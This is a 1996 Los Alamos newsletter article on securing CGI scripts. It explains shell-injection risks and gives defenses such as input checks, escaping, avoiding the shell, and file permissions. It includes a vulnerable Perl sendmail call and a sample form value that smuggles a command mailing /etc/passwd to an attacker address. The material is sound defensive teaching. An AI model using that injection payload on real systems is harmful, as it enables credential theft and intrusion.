CGI Security

March 1996 BITS: computing and communications news

The Common Gateway Interface (CGI) is what, for now at least, makes the World Wide Web interactive. CGI enables users to do more than simply read static files; it enables them to perform tasks such as searching for information, filling out and submitting forms, and more.

This capability makes the Web a far more useful place and has been widely adopted by the Internet community. Throughout the universities, laboratories, companies, and other organizations that make up the Web, CGI scripts are developed, refined, shared--and sometimes compromised.

For the Laboratory, too, CGI is a widely used tool. As always, and especially at an institution such as the Laboratory, whenever you allow somebody to execute tasks on your machine, you're opening a potential security hole and you need to make sure it's adequately plugged.

The Mechanism

Basically, there are two parts to a CGI "script": an executable (the script itself) and an HTML page that drives the executable. The executable can be just about anything that runs, including system calls, Perl scripts, shell scripts, and compiled programs (C, Pascal, etc.).

The HTML page is actually optional. CGI scripts can be used without user input to increment page counters, display the day and date, etc. If the user is to enter any information, however, the HTML page is needed.
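As a minimal sketch of a script that needs no driving HTML page, the following Perl returns the current day and date as a small HTML document. The subroutine name date_page is an assumption made for this illustration; the Content-type header followed by a blank line is what a CGI script is expected to emit ahead of its output.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Build the complete CGI response: a header, a blank line, then the page body.
# (date_page is a hypothetical name chosen for this sketch.)
sub date_page {
    my $now = localtime;    # scalar context gives a string such as "Fri Mar  1 09:30:00 1996"
    return "Content-type: text/html\n\n"
         . "<HTML><BODY><P>Today is $now.</P></BODY></HTML>\n";
}

print date_page();
```

Because the script takes no input from the user, it avoids most of the concerns discussed in the rest of this article.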

When both parts are properly constructed, the CGI action is performed as follows (as illustrated by a form submission):

The user pulls the HTML form page from the server onto his/her client machine (see Figure 1).
The user fills out the form on the client machine.
The user presses "Submit", which then sends an execute request to the server. (The client-side browser interprets the form into an execute request, which identifies the server-side program and includes the information that was filled into the form.)
The server executes the requested program.

Figure 1: CGI Execution Cycle

The same basic process occurs for other CGI scripts that accept user input. With a clickable imagemap, for example, the server sends the image to the client machine, and the browser then issues an execute request that specifies which part of the image was clicked on.
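To make the execute request more concrete, here is a rough sketch of how a Perl script might unpack the form data it receives. It assumes the form was submitted with the GET method, in which case the server passes the URL-encoded fields in the QUERY_STRING environment variable. The subroutine names url_decode and parse_form are illustrative, not part of any library.

```perl
use strict;
use warnings;

# Decode one URL-encoded component: '+' stands for a space, %XX for one byte.
sub url_decode {
    my ($text) = @_;
    $text =~ tr/+/ /;
    $text =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $text;
}

# Split "name=value&name2=value2" into a hash of decoded fields.
sub parse_form {
    my ($query) = @_;
    my %field;
    foreach my $pair (split /&/, $query) {
        next unless length $pair;            # skip empty pieces such as "a=1&&b=2"
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;   # a bare "name" has no value
        $field{ url_decode($name) } = url_decode($value);
    }
    return %field;
}

# With GET, the server hands the form data to the script in QUERY_STRING.
my %form = parse_form(defined $ENV{QUERY_STRING} ? $ENV{QUERY_STRING} : '');
print "$_ = $form{$_}\n" for sort keys %form;
```

Note that nothing in this step checks the values. Whatever the client sends, whether or not it came from the original form, ends up in %form.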

The fundamental strength of CGI is its simplicity. Entering information on the form and all other manipulation is performed on the client machine, so the server doesn't have to worry about it. All that the server has to do is to execute the request when it is issued.

Therein also lies the fundamental security weakness within CGI. Because the HTML page itself is transferred to the client machine, the user has an unrestricted ability to edit the page at will and to enter whatever he/she pleases. The execute request might easily be a good deal different from what you expect.

A Simple Shell Breach

The most commonly cited examples of CGI security breaches involve cajoling the shell into performing something unexpected. For instance, let's say we want a form that lets a user e-mail a message to a specified person. In our HTML form page, we might write something like the following:

<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov">Alan Arkin<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="lball@lanl.gov">Lucille Ball<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George Burns

Now let's say we execute a script that writes the message to a temporary file and then e-mails that file to the selected address. In Perl, this could be done with

system("/usr/lib/sendmail -t $send_to < $temp_file");

As long as the user selects from the addresses that are given, everything will work fine. There is, however, no way to be sure that the user will do so. Because the HTML form itself has been transferred to the user's client machine, he/she is free to edit it to read something like

<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd"> Alan Arkin<br>

As soon as this gets sent, the shell will treat the semicolon as a command separator: the original sendmail command ends there, and the shell then executes the next command, which would mail the password file to the attacker. The attacker could then try to crack the encrypted passwords it contains and use them to gain login access to your machine.
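The following sketch shows, without executing anything, the command string that the script would hand to the shell for the tampered value. The temporary file path is a made-up placeholder, and splitting on ";" is only a crude stand-in for how a real shell parses its input.

```perl
use strict;
use warnings;

# The value the tampered form submits, and a hypothetical temporary file name.
my $send_to   = 'aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd';
my $temp_file = '/tmp/message.txt';

# This is the string that system() would pass to the shell. It is only
# built and printed here, never executed.
my $command = "/usr/lib/sendmail -t $send_to < $temp_file";
print "$command\n";

# Crude approximation of the shell's view: ';' separates commands.
my @commands = split /;/, $command;
print scalar(@commands), " commands:\n";
print "  $_\n" for @commands;
```

The form offered a single e-mail address, but the shell sees two separate commands, and the second one was written entirely by the user.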

Other Breaches

The above example is not the only thing that can go wrong. Aside from capturing a password file, malicious users can also exploit poorly defended CGI to

Access other sensitive files;
Install and execute their own programs on your system (including "Trojan Horses" that monitor system activity and report back to the user);
Install other viruses; or
Gain an overall map of your filesystem in order to search for potential weaknesses.

Also, not all of the weaknesses are at the system level (and UNIX isn't the only vulnerable operating system). Other vulnerabilities that have been identified include the following:

Certain mail programs treat a line beginning with ~ in the message text as an escape that can execute arbitrary programs.
Server-side includes have been tricked into executing commands embedded within HTML comments in the input.
C programs that "forgot" array boundaries have been tricked into executing programs via very long input.
Some early sendmail programs allowed any user to execute arbitrary programs.

This is by no means a complete list. More breaches have been identified; others have been invented but not yet identified; still others have not yet been invented. The basic point, however, remains the same: CGI should always be used with caution.

How to Make Your CGI Secure

As with other areas of computer security, the basic idea behind securing CGI is to understand the demonstrated and potential threats, to counter these threats, and to monitor system activity for unusual events.

Start with an adequately secured server. This includes appropriate screening at the router, turning off un-needed daemons, creating a non-privileged WWW user and group, and restricting the file system. Additional precautions may be required, depending upon the partition in which you are working, who the intended audience is, and the sensitivity level of the data on the machine. These precautions include monitoring who accesses the scripts and the other activities those users perform, and consulting with your computer security officer as needed.

Beyond the basics, there are other methods of improving CGI security.

Never Accept Unchecked Input

Always check for special characters such as ";" before you open a shell. You can do this either by restricting the input you accept or by escaping any dangerous characters. In Perl, for example, the following line escapes dangerous UNIX shell characters within a variable:

$var =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;

Among the other things to check:

For server-side includes, check for "<" and ">" in order to identify and validate any embedded HTML tags.
For scripts that utilize e-mail, validate that the addresses are within an acceptable domain (e.g., make sure they end in "@lanl.gov").
Look for any occurrence of "/../" (which might indicate that the user is attempting to access higher levels of the directory structure).
For selection lists, check to make sure that the value sent is a valid choice.
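Several of the checks listed above can be sketched in a few lines of Perl. The subroutine names are illustrative assumptions, the list of recipients is taken from the example form earlier in this article, and the pattern for the part of an address before the "@" is deliberately strict rather than a complete description of legal addresses.

```perl
use strict;
use warnings;

# The only recipients the form offers (from the example form above).
my %ALLOWED_RECIPIENT = map { $_ => 1 }
    qw(aarkin@lanl.gov lball@lanl.gov gburns@lanl.gov);

# Selection lists: accept a value only if it is one of the choices offered.
sub is_valid_choice {
    my ($value) = @_;
    return (defined $value && exists $ALLOWED_RECIPIENT{$value}) ? 1 : 0;
}

# E-mail: accept only simple addresses in the acceptable domain.
# \A and \z anchor the whole string, so nothing may follow the domain.
sub is_lab_address {
    my ($address) = @_;
    return 0 unless defined $address;
    return $address =~ /\A[A-Za-z0-9._-]+\@lanl\.gov\z/ ? 1 : 0;
}

# Paths: flag any ".." component, which would climb the directory tree.
sub has_parent_reference {
    my ($path) = @_;
    return 0 unless defined $path;
    return $path =~ m{(?:\A|/)\.\.(?:/|\z)} ? 1 : 0;
}

my $tampered = 'aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd';
print "choice ok:  ", is_valid_choice($tampered), "\n";
print "address ok: ", is_lab_address($tampered), "\n";
```

All three checks describe what is acceptable and reject everything else, which tends to be easier to get right than trying to enumerate every dangerous character.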

Prefer Compiled Programs to Interpreted Scripts

This is a very general guideline, by no means an ironclad "rule." The basic idea is that a compiled program (e.g., a binary executable from C) is more difficult to make sense of if a user is able to get a copy of it. This in turn makes it more difficult for the user to search for potential weaknesses within the program.

Counterbalancing this general preference are the facts that an interpreted program (e.g., Perl) is generally easier for the programmer to understand (including whoever has to support the program after it is written) and easier to test (no need to compile before each test). Hence, even though the compiled programs are generally preferred, there are many specific cases where the interpreted program is perfectly acceptable.

Avoid the Shell

Again, this is a very general guideline--more of a caution than a rule. There is nothing inherently wrong with opening a shell, provided that the security implications are understood and addressed. Frequently, though, it is easier to sidestep the shell concerns and call a program directly.

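In UNIX/Perl, for example, a shell is opened by system, exec, backticks, and piped open whenever the command string they are given contains shell metacharacters. (eval does not open a shell, but it deserves the same caution because it executes whatever Perl code it is handed.) Hence, the basic weakness of the following line (taken from the above example) stems from the fact that the whole command string, user input included, is handed to a shell: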

system("/usr/lib/sendmail -t $send_to < $temp_file");

A construction like the following sidesteps this weakness by calling sendmail directly:

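open(MAIL, "|/usr/lib/sendmail -t") or die "Cannot run sendmail: $!";
print MAIL "To: $send_to\n";
print MAIL "\n";    # a blank line separates the headers from the message body
print MAIL "$input_line_1";
...etc.
close(MAIL);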

Keep in mind, however, that when you call a program directly you are in a sense trading the known security vulnerabilities of the shell for the potentially unknown vulnerabilities of the program.
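Perl also accepts a program and its arguments as a list, in which case the arguments are passed to the program as-is and no shell parses them. The sketch below uses /bin/echo as a harmless stand-in for a real program (its location is an assumption about the system), and run_without_shell is a hypothetical helper name.

```perl
use strict;
use warnings;

# Run a program with its arguments given as a list, so that no shell
# interprets them. Returns the program's standard output as one string.
sub run_without_shell {
    my ($program, @args) = @_;
    open(my $out, '-|', $program, @args)
        or die "Cannot run $program: $!";
    my $output = do { local $/; <$out> };   # read everything at once
    close($out);
    return defined $output ? $output : '';
}

# The ';' is delivered to echo as ordinary text; no second command is run.
my $hostile = 'aarkin@lanl.gov;echo INJECTED';
print run_without_shell('/bin/echo', $hostile);
```

The hostile value still reaches the program, so it must still be validated; the list form only removes the shell's interpretation of it.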

Control Filesystem Permissions

Users need to execute CGI scripts, but there is no reason for them to have read or write permissions. Similarly, users need to read the HTML driver files (and to read and execute their directory), but there is no need for them to have write or execute permission to the files (or write permission to their directory).

These controls are most easily maintained as follows:

Put scripts in a separate directory and set permissions for the directory and its files to rwx--x--x (or the equivalent).
If you are using compiled programs, put the source in a different directory from the compiled programs (to prevent users from "guessing" their name and accessing the source).
Do not leave old or not-yet-validated versions of scripts in the active scripts directory (including the filename~ backups that Emacs automatically makes).
Restrict permissions for HTML files to rw-r--r-- and for their directories to rwxr-xr-x (or the equivalents).
If the CGI output will be written to a file, put that file in a separate directory, assign that directory's ownership to the non-privileged WWW user, and set (umask) the permissions to rw------- for the file and rwx------ for the directory.
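As a rough illustration of the permission settings above, the following Perl builds a scratch directory tree and applies them. The directory and file names are invented for the sketch, a temporary directory stands in for the real server tree, and assigning ownership to the WWW user is left out because it normally requires root privileges.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Return a path's permission bits (e.g. 0644) without the file-type bits.
sub mode_of {
    my ($path) = @_;
    my @info = stat $path;
    return $info[2] & 07777;
}

# Create an empty file, failing loudly if that is not possible.
sub touch {
    my ($path) = @_;
    open(my $fh, '>', $path) or die "open $path: $!";
    close($fh);
}

my $root = tempdir(CLEANUP => 1);   # scratch stand-in for the server tree

# Scripts: rwx--x--x on the directory and on each script.
my $script_dir = "$root/cgi-bin";
my $script     = "$script_dir/mailform";
mkdir $script_dir or die "mkdir $script_dir: $!";
touch($script);
chmod 0711, $script_dir, $script;

# HTML: rwxr-xr-x on the directory, rw-r--r-- on the files.
my $html_dir = "$root/html";
my $page     = "$html_dir/form.html";
mkdir $html_dir or die "mkdir $html_dir: $!";
touch($page);
chmod 0755, $html_dir;
chmod 0644, $page;

# CGI output: with umask 077, new directories come out rwx------
# and new files rw-------.
umask 077;
my $data_dir  = "$root/data";
my $data_file = "$data_dir/messages";
mkdir $data_dir or die "mkdir $data_dir: $!";
touch($data_file);

printf "%04o %s\n", mode_of($_), $_
    for ($script_dir, $script, $html_dir, $page, $data_dir, $data_file);
```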

Validate Scripts from the Web

There are many CGI scripts freely available on the Web. While these can often serve as a good starting point, many of them come from university environments that do not have the same security concerns as the Laboratory. A number have been demonstrated to contain security holes, and some have even been found to contain Trojan Horses.

Any time you "borrow" a free script as a starting point, make sure to validate it for security. Check it as outlined above, and modify it as needed. Above all, don't run anything that contains any lines you don't understand. Don't even test it until you've figured it out--there's no telling what it might do.
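A small scan can help direct a review toward the lines that deserve the closest reading. The sketch below flags Perl constructs mentioned earlier in this article; the pattern list and the name flag_risky_lines are assumptions made for illustration, the list is far from complete, and a scan like this is no substitute for reading and understanding the whole script.

```perl
use strict;
use warnings;

# Constructs that can run other programs or generated code.
# This list is an assumption for the sketch, not a complete inventory.
my @RISKY = (
    [ qr/\b(?:system|exec)\b/, 'may start a shell' ],
    [ qr/`/,                   'backticks run a command' ],
    [ qr/\bopen\b.*\|/,        'piped open runs a command' ],
    [ qr/\beval\b/,            'eval runs generated code' ],
);

# Return one "line N: reason: text" string for each match found.
sub flag_risky_lines {
    my (@lines) = @_;
    my @findings;
    my $number = 0;
    foreach my $line (@lines) {
        $number++;
        foreach my $check (@RISKY) {
            my ($pattern, $reason) = @$check;
            next unless $line =~ $pattern;
            (my $text = $line) =~ s/\s+\z//;   # trim the trailing newline
            push @findings, "line $number: $reason: $text";
        }
    }
    return @findings;
}

# Lines borrowed from the examples in this article.
my @sample = (
    'print "Content-type: text/html\n\n";',
    'system("/usr/lib/sendmail -t $send_to < $temp_file");',
    'open(MAIL, "|/usr/lib/sendmail -t");',
);
print "$_\n" for flag_risky_lines(@sample);
```

To scan a file instead of the sample lines, the lines read from an open filehandle can be passed to flag_risky_lines in the same way.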

Additional Information

As CGI programming has become more popular, the amount of information about it and its security has grown. Good sources of information (including the sources of some of the above suggestions) include the following:

The CGI authoring newsgroup (news:comp.infosystems.www.authoring.cgi)
Lincoln Stein's "WWW Security FAQ" (http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html)
Paul Phillips' "Safe CGI Programming" (http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt)
Michael Van Biesbrouk's "CGI Security Tutorial" (http://csclub.uwaterloo.ca/u/mlvanbie/cgisec/)

Links to these and other security resources are available from the Information Architecture's Internet/WWW Subject Area web space--

http://www.lanl.gov/projects/ia-lanl/area/web/

For further information about the Information Architecture project itself, see

http://www.lanl.gov/projects/ia/

Or look under "What's New" from the Laboratory home page.

Tad Lane, tad@lanl.gov, (505) 667-0886
Information Architecture Standards Editor
Communications Arts and Services (CIC-1)
